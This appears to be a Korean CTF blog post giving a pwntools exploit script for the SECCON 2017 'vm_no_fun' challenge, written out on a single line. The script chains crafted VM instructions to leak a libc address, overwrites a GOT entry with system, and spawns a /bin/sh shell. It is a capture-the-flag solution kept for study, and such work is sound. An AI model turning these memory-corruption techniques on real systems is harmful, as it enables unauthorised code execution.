-
SECCON 2017 vm_no_funPwnable/CTF 2018. 8. 15. 11:44
VM 공부할겸 풀어봄 ㅎ
123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174from pwn import *from ctypes import *p = process('./inception')libc = cdll.LoadLibrary('/lib/x86_64-linux-gnu/libc.so.6')libc.srand(0x31337)def parse_vm(op,arg0,arg1,arg2):payload = p8(op)payload += '\x02'payload += p8(0x20) #typepayload += p8(arg0) #regi_idxpayload += '\x00'payload += p8(0x21) #typepayload += p8(arg1) #regi_idx |payload += p8(arg2) #regi_idx >>return payloaddef read_str(data):p.send(p32(len(data)))sleep(0.5)p.send(data)def input_vm1(ins):p.send('\x01')p.recvline()read_str(ins)def vm1_setread():return '\x0c\x00\xf4\x00'def vm1_setwrite():return '\x0b\x00\xf4\x00'def parse_vm2(op,arg1,arg5,arg6,arg10):arg4 = p8(0)arg3 = p8(arg1 / 0x10000)arg2 = p8((arg1 % 0x10000)/0x100)arg1 = p8((arg1 % 0x100))arg9 = p8(0)arg8 = p8(arg6 / 0x10000)arg7 = p8((arg6 % 0x10000)/0x100)arg6 = p8((arg6 % 0x100))payload = p8(op) + arg1 + arg2 + arg3 + arg4 + p8(arg5)payload += arg6 + arg7 + arg8 + arg9 + p8(arg10)return payloaddef input_vm2(payload):read_str(payload)sleep(2)p.send('\x02')def parse_vm3(op,arg0,arg1,arg3):arg0 = (arg0 >> 8)payload = p8(op) + p8(arg0)arg2 = (arg1>>8)arg1 -= arg2payload += p8(arg1) + p8(arg2)arg4 = (arg3>>8)arg3 -= arg4payload += p8(arg3) + p8(arg4)return payloadprint p.recvline()set_ = parse_vm(0x89,0x7,0x0,0x6) #movinput_vm1(set_+vm1_setread())read_str('/bin/sh\x00'*0x10) #FUCK ..set_ = parse_vm(0x89,0x7,0x0,0x6) #movset_ += parse_vm(0x89,0x0,0x10,0x0) #mov write_len_setinput_vm1(set_+vm1_setread())sleep(1)payload = parse_vm2(0xb4,0x1,0x20,0x900,0x21) #reg[1] = 0payload += parse_vm2(0x28,0xa,0x20,0x700,0x21) #reg[0xa] = 0x700payload += parse_vm2(0xb4,0x9,0x20,0x7000,0x21) #reg[9] = 0payload += parse_vm2(0xb4,0x9,0x20,0x100e0,0x21) #reg[9] = -0x100e0 #puts@got idxpayload += parse_vm2(0x28,0xb,0x20,0x10,0x21) #unk_225138 cpy_len arg = 0x10payload += parse_vm2(0x20,0x8,0x22,0x1,0x20) #poppayload += parse_vm2(0x20,0xc,0x22,0x1,0x20) #poppayload += parse_vm2(0x85,0x01,0x20,0x1,0x21) #cpy flag_setpayload += parse_vm2(0x83,0x01,0x20,0x1,0x21) #return 0sleep(1)input_vm2(payload)set_ = parse_vm(0x1,0x7,0x0,0x2)input_vm1(set_+vm1_setwrite())p.recvuntil('A')print p.recv(1024)print p.recv(20).encode('hex')puts = u64(p.recv(8))libc_base = puts - 0x6f690memcpy = libc_base + 0x14dea0system = libc_base + 0x45390count = [0]*3target = [0]*3target[0] = ((system&0xff))target[1] = ((system&0xff00)>>8)target[2] = ((system&0xff0000)>>16)sort = []for i in range(0,0x10000):if(len(sort)<3):random = libc.rand()&0xff #byteif(target[0]==random and count[0]<1):count[0] = iprint 'FIND {}'.format(target[0])sleep(3)sort.append(0)if(target[1]==random and count[1]<1):count[1] = iprint 'FIND {}'.format(target[1])sleep(3)sort.append(1)if(target[2]==random and count[2]<1):count[2] = iprint 'FIND {}'.format(target[2])sleep(3)sort.append(2)else:breakprint hex(memcpy)print hex(system)print 'target > {}'.format(target)print 'randCount > {}'.format(count)print 'Sort > {}'.format(sort)p.recv(1024)gdb.attach(p)set_ = parse_vm(0x89,0x7,0,0x6)input_vm1(set_+vm1_setread())payload = parse_vm2(0x28,0x7,0x20,(0x700-0x30),0x21)payload += parse_vm2(0xdb,0x1,0x20,0x1,0x21)payload += parse_vm2(0x83,0x1,0x20,0x1,0x21)payload += 'A'*15+'B'*0x2d0+'/bin/sh\x00'input_vm2(payload)set_ = parse_vm(0x89,0x7,0,0x6)input_vm1(set_+vm1_setread())payload = parse_vm2(0x28,0x7,0x20,0x5f0,0x21)payload += parse_vm2(0xdb,0x01,0x20,0x1,0x21)payload += parse_vm2(0x83,0x01,0x20,0x1,0x21)payload += '\x83'*(0x100-len(payload))vm3_p = parse_vm3(0x1,0x6500,0x3,0x0)for i in range(3):if(i == 0):target = (count[sort[i]] + 0x1)else:target = (count[sort[i]] - count[sort[i-1]])vm3_p += parse_vm3(0x1,0x6500,0xb,0x0)vm3_p += parse_vm3(0x3,0x6500,0xb,(0x58-sort[i]))for i in range(target):vm3_p += parse_vm3(0x15,0x6500,0x1,0x1)vm3_p += parse_vm3(0xc,0x6500,0x1,0x1) #call system('/bin/sh')vm3_p += parse_vm3(0xb,0x6500,0x1,0x1) #return 0payload += vm3_pprint len(payload)input_vm2(payload)p.recv(1024)p.send('\x03')###VM3 GOT -> SYSTEM ###p.interactive()cs 'Pwnable > CTF' 카테고리의 다른 글
PCTF 2017 Chakrazy (0) 2018.12.25 PCTF 2018 d8-dist (0) 2018.12.22 Codegate 2018 7ameBOX1 (0) 2018.05.21 RCTF 2018 Write up (2) 2018.05.21 Secuinside 2017 vvv (0) 2018.05.13